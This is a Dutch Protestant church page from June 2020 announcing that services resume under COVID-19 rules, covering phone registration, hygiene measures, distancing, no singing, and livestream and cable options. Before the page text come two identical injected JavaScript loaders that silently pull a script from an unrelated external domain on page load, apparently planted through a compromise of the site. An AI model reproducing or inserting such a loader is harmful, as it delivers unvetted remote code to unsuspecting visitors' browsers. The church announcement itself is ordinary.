;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezamenlijk bericht van beide kerkenraden - PKN Damwâld

Gezamenlijk bericht van beide kerkenraden

Gepubliceerd op: woensdag 17 juni 2020

Vanaf zondag 5 juli mogen we gelukkig weer samenkomen in de kerk, met maximaal 100 personen. Wij zijn als kerkenraden blij dat we weer de mogelijkheid hebben om samen kerkdiensten te vieren. Wij vinden het ook veilig genoeg, omdat de kerken steeds grondig worden gereinigd en ontsmet.

In De Ontmoeting is er plaats voor 100 personen en in De Ikker is plaats voor 50 personen, rekening houdend met de regels van het RIVM. Hiervoor is een gebruiksplan opgesteld. Dit gebruiksplan ligt in de beide kerken op de tafel. Hieronder volgt een samenvatting van de “spelregels”.

Opgeven
Als u de dienst wilt bijwonen, moet u zich per week vooraf opgeven voor de dienst van de komende zondag. Dit kan op woensdag-, donderdag- of vrijdagavond van 19.00-20.00 uur, uitsluitend via telefoonnummer: 06-1475 1932. Alleen de mensen die zich hebben opgegeven, kunnen de dienst bijwonen. Helaas, vol is vol. Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden.

Hygiëne
Heeft u klachten of bent u in contact geweest met iemand die corona-klachten heeft, blijf dan thuis. Bij binnenkomst moet u uw handen ontsmetten met het aanwezige ontsmettingsapparaat. De garderobe kan niet worden gebruikt, u moet uw jas mee naar binnen nemen, daar is genoeg ruimte. De toiletten mogen niet gebruikt worden en deze zijn dan ook afgesloten.

Begeleiding
Bij binnenkomst wordt u opgewacht door begeleiders. Deze leiden u via vaste looproutes naar uw plaats. Er zijn geen gereserveerde plaatsen aanwezig. Kerkgangers uit één samenlevend gezin mogen bij elkaar zitten. Overigen zitten met de afstand van 1,5 meter uit elkaar. De kerkbanken en stoelen zijn dusdanig geplaatst dat de 1,5 meter-norm is gegarandeerd.

Livestream
Zoals tot nu toe gebruikelijk is, houden we de ochtenddiensten gezamenlijk in De Ontmoeting. Deze diensten kunt u ook live meemaken via de livestream via www.pkndamwald.nl/live. Tevens kunt u de dienst beluisteren via Kabel Noord, kanaal (1)956. In de maanden juli en augustus is er ’s avonds nog een dienst. Deze wordt gehouden om 19.30 uur vanuit De Ikker. Deze dienst kunt u niet volgen via de livestream, maar alleen via Kabel Noord, kanaal (1)954.

Overig
Bevindt u zich in de risicogroep, dan adviseren wij u thuis te blijven. Zowel buiten als binnen de kerk dient u de 1,5 meter grens te handhaven. Er mag voorlopig helaas niet gezongen worden. Dit schijnt een belangrijke bron van besmetting te zijn.

Op de website kunt u het volledige protocol nalezen. Er is één voor De Ikker en één voor De Ontmoeting. Mocht u vragen hebben, belt u dan gerust met een van onderstaande contactpersonen.

Wij hopen dat u niet ontmoedigd wordt door alle regels. Uiteraard gaat alles momenteel nog “anders dan anders”, maar we hebben gelukkig weer de mogelijkheid om samen te komen in het huis van onze Vader.

Oant sjen!

Scriba Gereformeerde Kerk
Jan Reitsma: 0511-421542

Scriba Hervormde Kerk
Geralda Teertstra: 0511-424766